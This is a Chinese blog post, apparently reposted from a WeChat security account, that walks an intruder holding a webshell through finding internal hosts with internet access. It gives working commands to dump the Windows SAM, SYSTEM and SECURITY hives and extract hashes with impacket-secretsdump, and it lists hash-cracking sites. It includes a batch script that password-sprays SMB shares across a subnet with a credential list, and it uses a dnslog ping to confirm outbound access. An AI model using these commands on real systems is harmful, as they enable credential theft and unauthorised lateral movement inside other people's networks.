前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >内网渗透中寻找出网机器

内网渗透中寻找出网机器

作者头像
洛米唯熊
发布2022-02-28 10:07:33
8420
发布2022-02-28 10:07:33
举报
文章被收录于专栏:洛米唯熊洛米唯熊

0x00:前提

在webshell控制中,偶尔会遇到ipconfig查询IP中,里面的IP查询结果跟实际webshell的IP地址不同.

这种情况有可能是做了反向代理,或者其他情况.存在这种情况下,结合之前的文章获取一个shell.

例如:

那么就应该想方法让对方出网:

1、结合之前的文章进行出网

frp反向代理+MSF获取shell

2、读出本机密码,然后内网smb喷射,寻找内网能出网的机器,然后出网.

3、等等

0x01:过程

一、读出hash

代码语言:javascript
复制
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv

然后下载到本地

利用kali自带小工具进行读取hash

代码语言:javascript
复制
impacket-secretsdump -sam sam.hiv -system sys.hiv -security security.hiv LOCAL

在线hash破解

代码语言:javascript
复制
https://www.objectif-securite.ch/ophcrack
https://cmd5.com/

二、寻找内网开放smb机器

然后再把事先通过其它渠道搜集到的更多的管理账号密码写进去,越多越好

代码语言:javascript
复制
@echo off
set user=Administrador admin1 admin2
set pwd=central@1708 pass1 pass2
for /f %%i in (c:/users/public/host.txt) do (
for %%j in (%pwd%) do (
for %%k in (%user%) do (
net use \\%%i\c$ /user:"%%k" "%%j" > nul && ping 127.0.0.1 -n 2 > nul && if %errorlevel% equ 0 ( echo %%i %%k %%j Login Succeed && echo %%i %%k %%j 
Login Succeed >> c:\users\public\SmbCache.txt ) && ping 127.0.0.1 -n 2 > nul && net use \\%%i\c$ /del > nul && ping 127.0.0.1 -n 2 > nul
) ) )

host.txt存放存在开放445端口的IP清单

我是C段全部都给放进去了

开启喷射smb

结果如下

后面还有很多我就不一一列举了

前面端口扫描完毕以后会在cs(多人运动)中存在记录

我们将上面获取到的密码结合

然后cs 就会去做smb喷射

然后重复上面喷射出的结果

利用账户密码内网登陆其他主机

三、测试是否出外网

结合dnslog平台测试是否出外网.

接下来是到登陆成功的主机上执行shell ping g5xixi.dnslog.cn 即可,随后到DNSlog平台查看记录.

查询IP是否是外网IP

获取到出网机器,那么接下来就是转移自己目标,将主力放在能出网的机器上.

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-10-19,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档